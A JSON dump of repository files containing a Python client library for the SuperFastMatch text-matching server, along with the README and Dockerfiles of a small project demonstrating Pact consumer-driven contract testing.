\"\"\"\n data_bundle = self._tokenize(data_bundle, [Const.RAW_WORDS(0), Const.RAW_WORDS(1)],\n [Const.INPUTS(0), Const.INPUTS(1)])\n \n for dataset in data_bundle.datasets.values():\n if dataset.has_field(Const.TARGET):\n dataset.drop(lambda x: x[Const.TARGET] == '-')\n \n if self.lower:\n for name, dataset in data_bundle.datasets.items():\n dataset[Const.INPUTS(0)].lower()\n dataset[Const.INPUTS(1)].lower()\n \n word_vocab = Vocabulary()\n word_vocab.from_dataset(*[dataset for name, dataset in data_bundle.datasets.items() if 'train' in name],\n field_name=[Const.INPUTS(0), Const.INPUTS(1)],\n no_create_entry_dataset=[dataset for name, dataset in data_bundle.datasets.items() if\n 'train' not in name])\n word_vocab.index_dataset(*data_bundle.datasets.values(), field_name=[Const.INPUTS(0), Const.INPUTS(1)])\n \n target_vocab = Vocabulary(padding=None, unknown=None)\n target_vocab.from_dataset(*[ds for name, ds in data_bundle.iter_datasets() if 'train' in name],\n field_name=Const.TARGET,\n no_create_entry_dataset=[ds for name, ds in data_bundle.iter_datasets()\n if ('train' not in name) and (ds.has_field(Const.TARGET))]\n )\n if len(target_vocab._no_create_word) > 0:\n warn_msg = f\"There are {len(tgt_vocab._no_create_word)} target labels\" \\\n f\" in {[name for name in data_bundle.datasets.keys() if 'train' not in name]} \" \\\n f\"data set but not in train data set!.\"\n warnings.warn(warn_msg)\n logger.warn(warn_msg)\n\n has_target_datasets = [dataset for name, dataset in data_bundle.datasets.items() if\n dataset.has_field(Const.TARGET)]\n target_vocab.index_dataset(*has_target_datasets, field_name=Const.TARGET)\n \n data_bundle.set_vocab(word_vocab, Const.INPUTS(0))\n data_bundle.set_vocab(target_vocab, Const.TARGET)\n \n input_fields = [Const.INPUTS(0), Const.INPUTS(1), Const.INPUT_LENS(0), Const.INPUT_LENS(1)]\n target_fields = [Const.TARGET]\n \n for name, dataset in data_bundle.datasets.items():\n dataset.add_seq_len(Const.INPUTS(0), Const.INPUT_LENS(0))\n dataset.add_seq_len(Const.INPUTS(1), Const.INPUT_LENS(1))\n dataset.set_input(*input_fields, flag=True)\n for fields in target_fields:\n if dataset.has_field(fields):\n dataset.set_target(fields, flag=True)\n \n return data_bundle\n\n\nclass RTEPipe(MatchingPipe):\n def process_from_file(self, paths=None):\n data_bundle = RTELoader().load(paths)\n return self.process(data_bundle)\n\n\nclass SNLIPipe(MatchingPipe):\n def process_from_file(self, paths=None):\n data_bundle = SNLILoader().load(paths)\n return self.process(data_bundle)\n\n\nclass QuoraPipe(MatchingPipe):\n def process_from_file(self, paths):\n data_bundle = QuoraLoader().load(paths)\n return self.process(data_bundle)\n\n\nclass QNLIPipe(MatchingPipe):\n def process_from_file(self, paths=None):\n data_bundle = QNLILoader().load(paths)\n return self.process(data_bundle)\n\n\nclass MNLIPipe(MatchingPipe):\n def process_from_file(self, paths=None):\n data_bundle = MNLILoader().load(paths)\n return self.process(data_bundle)\n" }, { "alpha_fraction": 0.5947271585464478, "alphanum_fraction": 0.6100552082061768, "avg_line_length": 40.82051467895508, "blob_id": "d1061d3ca4332a9f53b0cd88f54f54d0a6d30549", "content_id": "715114584bee8781a0ce52296c3d72508b6afb2a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1631, "license_type": "permissive", "max_line_length": 116, "num_lines": 39, "path": "/test/embeddings/test_bert_embedding.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "import unittest\nfrom fastNLP import Vocabulary\nfrom fastNLP.embeddings import BertEmbedding\nimport torch\nimport os\n\[email protected]('TRAVIS' in os.environ, \"Skip in travis\")\nclass TestDownload(unittest.TestCase):\n def test_download(self):\n # import os\n vocab = Vocabulary().add_word_lst(\"This is a test .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='en')\n words = torch.LongTensor([[2, 3, 4, 0]])\n print(embed(words).size())\n\n for pool_method in ['first', 'last', 'max', 'avg']:\n for include_cls_sep in [True, False]:\n embed = BertEmbedding(vocab, model_dir_or_name='en', pool_method=pool_method,\n include_cls_sep=include_cls_sep)\n print(embed(words).size())\n\n def test_word_drop(self):\n vocab = Vocabulary().add_word_lst(\"This is a test .\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='en', dropout=0.1, word_dropout=0.2)\n for i in range(10):\n words = torch.LongTensor([[2, 3, 4, 0]])\n print(embed(words).size())\n\n\nclass TestBertEmbedding(unittest.TestCase):\n def test_bert_embedding_1(self):\n vocab = Vocabulary().add_word_lst(\"this is a test . [SEP]\".split())\n embed = BertEmbedding(vocab, model_dir_or_name='test/data_for_tests/embedding/small_bert', word_dropout=0.1)\n requires_grad = embed.requires_grad\n embed.requires_grad = not requires_grad\n embed.train()\n words = torch.LongTensor([[2, 3, 4, 0]])\n result = embed(words)\n self.assertEqual(result.size(), (1, 4, 16))\n" }, { "alpha_fraction": 0.5203609466552734, "alphanum_fraction": 0.6159185767173767, "avg_line_length": 44, "blob_id": "8938dbe494dbc91fa3eb29bfe09574f6cb01d5b1", "content_id": "7fcf97b36075862ff4091bfccd1d06ae01249f29", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5740, "license_type": "permissive", "max_line_length": 247, "num_lines": 96, "path": "/docs/source/tutorials/tutorial_9_seq_labeling.rst", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "=====================\n快速实现序列标注模型\n=====================\n\n这一部分的内容主要展示如何使用fastNLP 实现序列标注任务。你可以使用fastNLP的各个组件快捷,方便地完成序列标注任务,达到出色的效果。\n在阅读这篇Tutorial前,希望你已经熟悉了fastNLP的基础使用,尤其是数据的载入以及模型的构建,通过这个小任务的能让你进一步熟悉fastNLP的使用。\n我们将对基于Weibo的中文社交数据集进行处理,展示如何完成命名实体标注任务的整个过程。\n\n载入数据\n===================================\nfastNLP的数据载入主要是由Loader与Pipe两个基类衔接完成的。通过Loader可以方便地载入各种类型的数据。同时,针对常见的数据集,我们已经预先实现了载入方法,其中包含weibo数据集。\n在设计dataloader时,以DataSetLoader为基类,可以改写并应用于其他数据集的载入。\n\n.. code-block:: python\n\n\tfrom fastNLP.io import WeiboNERLoader\n\tdata_bundle = WeiboNERLoader().load()\n\n\n\n载入后的数据如 ::\n\n\t{'dev': DataSet(\n\t{{'raw_chars': ['用', '最', '大', '努', '力', '去', '做''人', '生', '。', '哈', '哈', '哈', '哈', '哈', '哈', '\n 'target': ['O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O',, 'O', 'O', 'O', 'O', 'O', 'O'] type=list})}\n\n\t{'test': DataSet(\n\t{{'raw_chars': ['感', '恩', '大', '回', '馈'] type=list, 'target': ['O', 'O', 'O', 'O', 'O'] type=list})}\n\n\t{'train': DataSet(\n\t{'raw_chars': ['国', '安', '老', '球', '迷'] type=list, 'target': ['B-ORG.NAM', 'I-ORG.NAM', 'B-PER.NOM', 'I-PER.NOM', 'I-PER.NOM'] type=list})}\n\n\n\n数据处理\n----------------------------\n我们进一步处理数据。通过Pipe基类处理Loader载入的数据。 如果你还有印象,应该还能想起,实现自定义数据集的Pipe时,至少要编写process 函数或者process_from_file 函数。前者接受 :class:`~fastNLP.DataBundle` 类的数据,并返回该 :class:`~fastNLP.DataBundle` 。后者接收数据集所在文件夹为参数,读取并处理为 :class:`~fastNLP.DataBundle` 后,通过process 函数处理数据。\n这里我们已经实现通过Loader载入数据,并已返回 :class:`~fastNLP.DataBundle` 类的数据。我们编写process 函数以处理Loader载入后的数据。\n\n.. code-block:: python\n\n from fastNLP.io import ChineseNERPipe\n data_bundle = ChineseNERPipe(encoding_type='bioes', bigram=True).process(data_bundle)\n\n载入后的数据如下 ::\n\n {'raw_chars': ['用', '最', '大', '努', '力', '去', '做', '值', '得', '的', '事', '人', '生', '。', '哈', '哈', '哈', '哈', '哈', '哈', '我', '在'] type=list,\n 'target': [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] type=list,\n 'chars': [97, 71, 34, 422, 104, 72, 144, 628, 66, 3, 158, 2, 9, 647, 485, 196, 2,19] type=list,\n 'bigrams': [5948, 1950, 34840, 98, 8413, 3961, 34841, 631, 34842, 407, 462, 45, 3 1959, 1619, 3, 3, 3, 3, 3, 2663, 29, 90] type=list,\n 'seq_len': 30 type=int}\n\n模型构建\n--------------------------------\n我们使用CNN-BILSTM-CRF模型完成这一任务。在网络构建方面,fastNLP的网络定义继承pytorch的 :class:`nn.Module` 类。\n自己可以按照pytorch的方式定义网络。需要注意的是命名。fastNLP的标准命名位于 :class:`~fastNLP.Const` 类。\n\n模型的训练\n首先实例化模型,导入所需的char embedding以及word embedding。Embedding的载入可以参考教程。\n也可以查看 :mod:`~fastNLP.embedding` 使用所需的embedding 载入方法。\nfastNLP将模型的训练过程封装在了 :class:`~fastnlp.Trainer` 类中。\n根据不同的任务调整trainer中的参数即可。通常,一个trainer实例需要有:指定的训练数据集,模型,优化器,loss函数,评测指标,以及指定训练的epoch数,batch size等参数。\n\n.. code-block:: python\n\n #实例化模型\n model = CNBiLSTMCRFNER(char_embed, num_classes=len(data_bundle.vocabs['target']), bigram_embed=bigram_embed)\n #定义评估指标\n Metrics=SpanFPreRecMetric(data_bundle.vocabs['target'], encoding_type='bioes')\n #实例化trainer并训练\n Trainer(data_bundle.datasets['train'], model, batch_size=20, metrics=Metrics, num_workers=2, dev_data=data_bundle. datasets['dev']).train()\n\n \n训练中会保存最优的参数配置。\n\n训练的结果如下 ::\n\n Evaluation on DataSet test: \n SpanFPreRecMetric: f=0.727661, pre=0.732293, rec=0.723088\n Evaluation at Epoch 1/100. Step:1405/140500. SpanFPreRecMetric: f=0.727661, pre=0.732293, rec=0.723088\n \n Evaluation on DataSet test:\n SpanFPreRecMetric: f=0.784307, pre=0.779371, rec=0.789306\n Evaluation at Epoch 2/100. Step:2810/140500. SpanFPreRecMetric: f=0.784307, pre=0.779371, rec=0.789306\n \n Evaluation on DataSet test: \n SpanFPreRecMetric: f=0.810068, pre=0.811003, rec=0.809136\n Evaluation at Epoch 3/100. Step:4215/140500. SpanFPreRecMetric: f=0.810068, pre=0.811003, rec=0.809136\n \n Evaluation on DataSet test: \n SpanFPreRecMetric: f=0.829592, pre=0.84153, rec=0.817989\n Evaluation at Epoch 4/100. Step:5620/140500. SpanFPreRecMetric: f=0.829592, pre=0.84153, rec=0.817989\n \n Evaluation on DataSet test:\n SpanFPreRecMetric: f=0.828789, pre=0.837096, rec=0.820644\n Evaluation at Epoch 5/100. Step:7025/140500. SpanFPreRecMetric: f=0.828789, pre=0.837096, rec=0.820644\n\n\n" } ]
17
silverasm/python-superfastmatch
https://github.com/silverasm/python-superfastmatch
4aca8f3326a0af8ee38e5c83c46d3638b91b5b22
126a5e0a7c48f5b734d38ab3c1383a1a37446020
38684bf475aa1b2f51ef72de8ae99ebbd484b43c
refs/heads/master
2021-01-15T19:50:45.559664
2012-04-11T22:02:48
2012-04-11T22:02:48
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5490516424179077, "alphanum_fraction": 0.5573904514312744, "avg_line_length": 31.02094268798828, "blob_id": "f8dc027f32d9ee0f0641e75e9417de4a63bcc635", "content_id": "e28c631f607d28e2f41a1bc616b71b97237324da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6116, "license_type": "no_license", "max_line_length": 133, "num_lines": 191, "path": "/superfastmatch/client.py", "repo_name": "silverasm/python-superfastmatch", "src_encoding": "UTF-8", "text": "\"\"\" Python library for interacting with SuperFastMatch server.\n\"\"\"\n\n__author__ = \"James Turk ([email protected])\"\n__version__ = \"0.1.0-dev\"\n__copyright__ = \"Copyright (c) 2011 Sunlight Labs\"\n__license__ = \"BSD\"\n\nimport logging\nimport urllib\nimport urlparse\nimport httplib\nimport httplib2\nimport json\nimport stream\n\n\nlog = logging.getLogger(__name__)\n\n\nclass SuperFastMatchError(Exception):\n \"\"\" Exception for SFM API errors \"\"\"\n def __init__(self, msg, status, expected_status, *args, **kwargs):\n super(SuperFastMatchError, self).__init__(msg, *args, **kwargs)\n self.status = status\n self.expected_status = expected_status\n\n\ndef parse_doctype_range(rangestr):\n \"\"\"Return a list of the doctypes in the range specified expanded as a list \n of integers. This is used to validate arguments. The actual range strings\n are passed onto the superfastmatch server.\n\n >>> parse_doctype_range('1-2:5:7-9')\n [1, 2, 5, 7, 8, 9]\n >>> parse_doctype_range('')\n >>> parse_doctype_range('1')\n [1]\n >>> parse_doctype_range('7-7')\n [7]\n \"\"\"\n if not rangestr:\n raise Exception('Invalid doctype range ({0})'.format(rangestr))\n\n split_on_hyphen = lambda s: s.split('-')\n\n def expand(rng):\n if len(rng) == 1:\n return int(rng[0])\n elif len(rng) == 2:\n return range(int(rng[0]), int(rng[1]) + 1)\n else:\n raise Exception('Unrecognized range data type')\n\n return (stream.Stream(rangestr.split(':'))\n >> stream.map(split_on_hyphen)\n >> stream.map(expand)\n >> stream.flatten\n >> list)\n\n\ndef ensure_sequence(arg):\n if hasattr(arg, 'strip'):\n return [arg]\n if hasattr(arg, '__getitem__'):\n return arg\n elif hasattr(arg, '__iter__'):\n return list(arg)\n else:\n return [arg]\n\n\nclass Client(object):\n\n\n def __init__(self, url='http://127.0.0.1:8080/', parse_response=True,\n username=None, password=None):\n self.url = url\n if not self.url.endswith('/'):\n self.url += '/'\n self._http = httplib2.Http()\n if username is not None and password is not None:\n self._http.add_credentials(username, password)\n self.parse_response = parse_response\n\n\n\n def _apicall(self, method, path, expected_status, params=''):\n expected_status = ensure_sequence(expected_status)\n\n if params:\n for (key, value) in params.iteritems():\n if isinstance(value, unicode):\n params[key] = value.encode('utf-8')\n params = urllib.urlencode(params, doseq=True)\n elif params == {}:\n params = ''\n uri = urlparse.urljoin(self.url, path)\n headers = {}\n if method == 'GET' and params:\n uri = uri + '?' + params\n params = None\n log.debug('httplib2.Http.request(uri={uri!r}, method={method!r}, params={params!r}, headers={headers!r})'.format(**locals()))\n resp, content = self._http.request(uri, method, params, headers)\n status = int(resp['status'])\n if status in expected_status:\n if self.parse_response == True:\n if resp['content-type'] in 'application/json':\n obj = json.loads(content)\n return obj\n return content\n else:\n tmpl = \"Unexpected HTTP status. Expecting {0!r} but got {1!r} on {2!r}\"\n msg = tmpl.format(str(expected_status), status, uri)\n raise SuperFastMatchError(msg, status, expected_status)\n\n\n def add(self, doctype, docid, text, defer=False, **kwargs):\n method = 'POST' if defer else 'PUT'\n kwargs['text'] = text\n return self._apicall(method, 'document/%s/%s/' % (doctype, docid),\n httplib.ACCEPTED, kwargs)\n\n\n def delete(self, doctype, docid):\n return self._apicall('DELETE', 'document/%s/%s/' % (doctype, docid),\n [httplib.ACCEPTED, httplib.NOT_FOUND])\n\n\n def get(self, doctype, docid):\n return self._apicall('GET', 'document/%s/%s/' % (doctype, docid),\n [httplib.OK, httplib.NOT_FOUND, httplib.NOT_MODIFIED],\n {})\n\n\n def associations(self, doctype=None, page=None):\n url = 'association/'\n if doctype is not None:\n url = '%s%s' % (url, doctype)\n params = {}\n if page is not None:\n params['cursor'] = page\n return self._apicall('GET', url, httplib.OK, params)\n\n\n def update_associations(self, doctype=None, doctype2=None, skip_validation=False):\n url = 'associations/'\n if doctype:\n if not skip_validation:\n parse_doctype_range(doctype)\n url = '%s%s/' % (url, doctype)\n if doctype2:\n if not skip_validation:\n parse_doctype_range(doctype2)\n url = '%s%s/' % (url, doctype2)\n return self._apicall('POST', url, httplib.ACCEPTED)\n\n\n def document(self, doctype, docid):\n url = 'document/%s/%s' % (doctype, docid)\n return self._apicall('GET', url, [httplib.OK, httplib.NOT_MODIFIED, httplib.NOT_FOUND])\n\n\n def documents(self, doctype=None, page=None, order_by=None, limit=None):\n url = 'document/'\n if doctype is not None:\n url = \"%s%s/\" % (url, doctype)\n params = {}\n if page is not None:\n params['cursor'] = page\n if order_by is not None:\n params['order_by'] = order_by\n if limit is not None:\n params['limit'] = limit\n return self._apicall('GET', url, httplib.OK, params)\n\n\n def search(self, text, doctype=None, **kwargs):\n url = 'search/'\n params = kwargs\n if text is not None:\n params['text'] = text\n if doctype:\n url = '%s/%s/' % (url, doctype)\n params['doctype'] = str(doctype)\n\n return self._apicall('POST', url, httplib.OK, params)\n\n\n def queue(self):\n return self._apicall('GET', 'queue/', httplib.OK)\n" }, { "alpha_fraction": 0.5897436141967773, "alphanum_fraction": 0.5920745730400085, "avg_line_length": 39, "blob_id": "aef6ed03de5c72c992203df9f114390edfe624ce", "content_id": "21eeacb8e6510b4d75c68a5d7906eb896773d5a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3003, "license_type": "no_license", "max_line_length": 138, "num_lines": 75, "path": "/superfastmatch/iterators.py", "repo_name": "silverasm/python-superfastmatch", "src_encoding": "UTF-8", "text": "import logging\nfrom .client import Client\n\nlog = logging.getLogger(__name__)\n\ndef maxindexof(l):\n return len(l) - 1\n\nclass DocumentIterator(object):\n \"\"\"Iterates through the documents on a superfastmatch server. The order is determined \n by the `order_by` argument. It should be the name of a metadata field, optionally prefixed\n by a hyphen (-) to indicate a reversal of the natural order. The `chunksize` option is\n available for optimization. It determines how many documents are retrieved from the server\n per request. The `doctype` argument can be used to limit the iteration to the a specific\n range of doctypes.\n \"\"\"\n\n def __init__(self, client, order_by, doctype=None, chunksize=100):\n assert isinstance(client, Client), 'The first argument to DocumentIterator() must be an instance of superfastmatch.client.Client.'\n self.client = client\n # response: the most recent response from the server\n self.response = None\n # chunk: a list of documents returned from the server\n self.chunk = None\n # index: the index into `chunk` of the previously-returned document\n self.index = None\n\n self.chunksize = chunksize\n self.doctype = doctype\n self.order_by = order_by\n\n def __iter__(self):\n return self\n\n def next(self):\n if self.chunk is None or self.index == maxindexof(self.chunk):\n self.fetch_chunk()\n else:\n self.index += 1\n return self.current()\n\n def current(self):\n if self.chunk is None or self.index is None:\n return None\n return self.chunk[self.index]\n\n def fetch_chunk(self):\n if self.response is None:\n log.debug('Fetching first chunk of size {limit} ordered by {order_by}'.format(\n limit=self.chunksize, order_by=self.order_by))\n response = self.client.documents(doctype=self.doctype,\n order_by=self.order_by,\n limit=self.chunksize)\n self.accept_response(response)\n\n else:\n next_cursor = self.response['cursors']['next']\n if next_cursor == u'':\n raise StopIteration()\n\n log.debug('Fetching chunk of size {limit} at {next_cursor} ordered by {order_by}'.format(\n limit=self.chunksize, next_cursor=next_cursor, order_by=self.order_by))\n response = self.client.documents(doctype=self.doctype, \n page=next_cursor, \n order_by=self.order_by,\n limit=self.chunksize)\n self.accept_response(response)\n\n def accept_response(self, response):\n if response['success'] == False or len(response['rows']) == 0:\n raise StopIteration()\n\n self.response = response\n self.chunk = response['rows']\n self.index = 0\n\n\n\n" }, { "alpha_fraction": 0.6573171019554138, "alphanum_fraction": 0.6585366129875183, "avg_line_length": 38, "blob_id": "f14398efd0956abfd72a7527cacb7bd32175e208", "content_id": "fedb4995e4290e3749a79e94b06e9884de4ea5a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 820, "license_type": "no_license", "max_line_length": 127, "num_lines": 21, "path": "/superfastmatch/djangoclient.py", "repo_name": "silverasm/python-superfastmatch", "src_encoding": "UTF-8", "text": "import superfastmatch.client\nfrom django.conf import settings\n\nclass Client(superfastmatch.client.Client):\n def __init__(self, confkey='default', *args, **kwargs):\n assert hasattr(settings, 'SUPERFASTMATCH'), \"You must configure the Django Superfastmatch client.\"\n assert confkey in settings.SUPERFASTMATCH, \"You must configure the '{0}' Django Superfastmatch client.\".format(confkey)\n\n def copy_setting(key):\n if key not in kwargs and key in settings.SUPERFASTMATCH[confkey]:\n kwargs[key] = settings.SUPERFASTMATCH[confkey][key]\n\n copy_setting('url')\n copy_setting('username')\n copy_setting('password')\n copy_setting('parse_response')\n\n super(Client, self).__init__(*args, **kwargs)\n\nif __name__ == \"__main__\":\n client = Client()\n\n" }, { "alpha_fraction": 0.8144329786300659, "alphanum_fraction": 0.8144329786300659, "avg_line_length": 26.714284896850586, "blob_id": "2a902a4f3e1bebaee8102b9aed704da921e317cb", "content_id": "b62955191b4085f45ddf44a94cbf8feedf06fd70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 194, "license_type": "no_license", "max_line_length": 52, "num_lines": 7, "path": "/superfastmatch/__init__.py", "repo_name": "silverasm/python-superfastmatch", "src_encoding": "UTF-8", "text": "from .client import Client\nfrom .client import SuperFastMatchError\ntry:\n from .djangoclient import Client as DjangoClient\nexcept ImportError:\n pass\nfrom .iterators import DocumentIterator\n" } ]
4
SYJINTW/TMIV_camera_position
https://github.com/SYJINTW/TMIV_camera_position
a72b1a9b00e95cfe448ce73c05f7d409ce90af35
038dcaa05fbcff936ac2eafe3295dc9fac605edb
c4d09be4eace89eb9ca444e23adf0202a6094bcb
refs/heads/master
2023-07-26T01:19:01.028254
2021-09-06T05:12:07
2021-09-06T05:12:07
400,394,289
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5137614607810974, "alphanum_fraction": 0.607798159122467, "avg_line_length": 21.842105865478516, "blob_id": "05620e406b931c847c7517f6453b3aa2ef74f175", "content_id": "e73545961f4aa79ea07c58a19a4f73ff4dfa1d38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 436, "license_type": "no_license", "max_line_length": 107, "num_lines": 19, "path": "/group.py", "repo_name": "SYJINTW/TMIV_camera_position", "src_encoding": "UTF-8", "text": "import math\n\n# r = 2.75\n# angle = 0\n# step = 180/5\n# arr = []\n# while angle <= 180:\n# arr.append((round(r*math.sin(angle*math.pi/180),2), round(r*math.cos(angle*math.pi/180),2),angle-90))\n# angle = angle + step\n# print(arr)\n\nr = 4\nangle = 0\nstep = 180/12\narr = []\nwhile angle <= 180:\n arr.append((round(r*math.sin(angle*math.pi/180),2), round(r*math.cos(angle*math.pi/180),2),angle-90))\n angle = angle + step\nprint(arr)\n\n\n" }, { "alpha_fraction": 0.4914810061454773, "alphanum_fraction": 0.5273918509483337, "avg_line_length": 27.051469802856445, "blob_id": "17795e6d92627da4f3f54db7df46a3fa58dfd52e", "content_id": "c277191d65692de84245cd26780c8946ea097ae7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3815, "license_type": "no_license", "max_line_length": 148, "num_lines": 136, "path": "/show.py", "repo_name": "SYJINTW/TMIV_camera_position", "src_encoding": "UTF-8", "text": "\nimport math\nfrom matplotlib import colors\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n# edit\ncamera_center = ['usr',1,0,0,0,0,90]\nfile_name = 'sixsix.csv'\noutput_name = 'output.csv'\n\n\n\ndef Normalize(data, center):\n return data[1]-center[0], data[2]-center[1], data[3]-center[2] \n\n# yaw, row, pitch to vector\ndef YRPtoVectorDir(yaw, pitch, row):\n x_dir = math.cos(yaw)*math.cos(pitch)\n y_dir = math.sin(yaw)*math.cos(pitch)\n z_dir = math.sin(pitch)\n return x_dir, y_dir, z_dir\n\n# u: usr\n# c: camera\ndef Rotate(u_data, c_data):\n c_xyz = np.array([[c_data[1]],\n [c_data[2]],\n [c_data[3]]])\n u_y, u_p, u_r = u_data[4]*math.pi/180, u_data[5]*math.pi/180, u_data[6]*math.pi/180\n\n # roll rotate x, pitch rotate y, yaw rotate z\n yaw_mat = np.array([[math.cos(u_y), -(math.sin(u_y)), 0],\n [math.sin(u_y), math.cos(u_y), 0],\n [0, 0, 1]\n ])\n pitch_mat = np.array([[math.cos(u_p), 0, -(math.sin(u_p))],\n [0, 1, 0],\n [math.sin(u_p), 0, math.cos(u_p)]\n ])\n roll_mat = np.array([[1, 0, 0],\n [0, math.cos(u_r), -(math.sin(u_r))],\n [0, math.sin(u_r), math.cos(u_r)]\n ])\n \n new_xyz = np.dot(yaw_mat, c_xyz)\n new_xyz = np.dot(pitch_mat, new_xyz)\n new_xyz = np.dot(roll_mat, new_xyz)\n \n new_y = c_data[4] + u_data[4]\n new_p = c_data[5] + u_data[5]\n new_r = c_data[6] + u_data[6]\n\n return round(new_xyz[0][0],2), round(new_xyz[1][0],2), round(new_xyz[2][0],2), round(new_y,2), round(new_p,2), round(new_r,2)\n\n\ndef Move(u_data, c_data):\n return float(c_data[1])+u_data[1], float(c_data[2])+u_data[2], float(c_data[3])+u_data[3]\n\ndef main():\n global camera_center\n global file_name\n global output_name\n\n # read data\n df = pd.read_csv(file_name)\n # values in pandas module will automatic change array into numpy array\n datas = df.values\n\n \n\n tmp_center = [float(datas[0][1]),float(datas[0][2]),float(datas[0][3])]\n\n for data in datas:\n data[1], data[2], data[3] = Normalize(data, tmp_center)\n\n\n for data in datas:\n # rotate\n data[1], data[2], data[3], data[4], data[5], data[6] = Rotate(camera_center, data)\n # move\n data[1], data[2], data[3] = Move(camera_center, data)\n\n # write csv\n pd.DataFrame(datas).to_csv(output_name,index=False,float_format='{:f}'.format,header=['name','x','y','z','yaw','pitch','row'], encoding='utf-8')\n\n for data in datas:\n # [name, x, y, z, y, r, p] to [name, x, y, z, x_dir, y_dir, z_dir]\n data[4], data[5], data[6] = YRPtoVectorDir(float(data[4])*math.pi/180, float(data[5])*math.pi/180, float(data[6])*math.pi/180)\n\n\n center = [float(datas[0][1]),float(datas[0][2]),float(datas[0][3])]\n datas = np.delete(datas, 0, 0)\n nums_datas = np.shape(datas)[0]\n\n x = []\n y = []\n z = []\n x_dir = []\n y_dir = []\n z_dir = []\n\n for data in datas:\n x.append(float(data[1]))\n y.append(float(data[2]))\n z.append(float(data[3]))\n x_dir.append(float(data[4]))\n y_dir.append(float(data[5]))\n z_dir.append(float(data[6]))\n\n\n # plot\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n cols = ['r', 'g', 'b']\n\n # center point\n ax.scatter(center[0],center[1],center[2],c=\"red\")\n # cameras\n quivers = ax.quiver(x,y,z,x_dir,y_dir,z_dir)\n\n # UI\n ax.set_xlim3d([-3.0, 3.0])\n ax.set_xlabel('X')\n\n ax.set_ylim3d([-3.0, 3.0])\n ax.set_ylabel('Y')\n\n ax.set_zlim3d([-3.0, 3.0])\n ax.set_zlabel('Z')\n\n plt.show()\n\nif __name__ == '__main__':\n main()" } ]
2
heber013/consumer-driven-contract-test
https://github.com/heber013/consumer-driven-contract-test
4653100163d0a43351d8bf6b00f34d9ff057e175
115a7c6c5b2f516a0ddb02315a9b2a11aa8f9cfc
a35ed331e0674cd173555e5a94a8758aad033ce9
refs/heads/master
2021-09-09T09:45:44.104760
2018-03-14T21:05:27
2018-03-14T21:05:27
124,950,491
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.7002497911453247, "alphanum_fraction": 0.7002497911453247, "avg_line_length": 32.38888931274414, "blob_id": "e554a5e69decf8930ab9e3bbb9fc3d4db256439a", "content_id": "c3661f85331e9ada6cde4abf249ffe1af6aa2731", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1201, "license_type": "no_license", "max_line_length": 157, "num_lines": 36, "path": "/README.rst", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "Consumer driven contract test using Pact\n########################################\nSample project to set up contract testing using `python implementation <https://github.com/pact-foundation/pact-python>`_ of `pact <https://docts.pact.io>`_.\n\nIn this example the Consumer is LoginService and the provider is UserService, both in the same repository for simplicity.\n\nPrerequisites\n-------------\n- Docker\n- Docker compose\n\nRun contract tests in consumer service\n--------------------------------------\nThe first part of contract testing is to run the tests on the consumer side in order to generate the pact files,\nthey are similar to unit tests with the difference that they use a mock service provided by pact\nand generate the pact files:\n\n::\n\n$ cd login_service\n$ docker-compose up --build\n\nIt will run the contract tests in a container and put the resulting pact files in:\n**consumer-driven-contract/pacts**\n\nVerify pacts in the provider service\n------------------------------------\nNow we have to verify that the actual provider service satisfies the contract generated by the consumer,\nin this example we use a docker pact verifier:\n\n::\n\n$ cd user_service\n$ docker-compose up --build\n\nVerify results." }, { "alpha_fraction": 0.7108433842658997, "alphanum_fraction": 0.7349397540092468, "avg_line_length": 10.857142448425293, "blob_id": "e7d02021e5c93cbb0d5ce40a59c24c5d3eacb6eb", "content_id": "e22afdccd88915ee76aa45fd7e07cef707befd2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 83, "license_type": "no_license", "max_line_length": 35, "num_lines": 7, "path": "/login_service/Dockerfile", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "FROM python:3.6\n\nADD . /login\n\nWORKDIR /login\n\nRUN pip install -r requirements.txt\n" }, { "alpha_fraction": 0.7075471878051758, "alphanum_fraction": 0.7264150977134705, "avg_line_length": 10.777777671813965, "blob_id": "845e929eb243a2281c1e89676da57a6f0d77e168", "content_id": "c3f961b3ed4b2e3b0744204687991771427b56b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 106, "license_type": "no_license", "max_line_length": 35, "num_lines": 9, "path": "/user_service/Dockerfile", "repo_name": "heber013/consumer-driven-contract-test", "src_encoding": "UTF-8", "text": "FROM python:3.6\n\nADD . /users\n\nWORKDIR /users\n\nRUN pip install -r requirements.txt\n\nENTRYPOINT [\"python\"]\n" }, { "alpha_fraction": 0.8571428656578064, "alphanum_fraction": 0.8571428656578064, "avg_line_length": 10.666666984558105, "blob_id": "ad4a695ba8c91a87b12e23a5194eb5d34e07f7cf", "content_id": "87783c8547b7bdbff49ad9c13fdbbbc38d922b53", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 35, "license_type": "no_license", 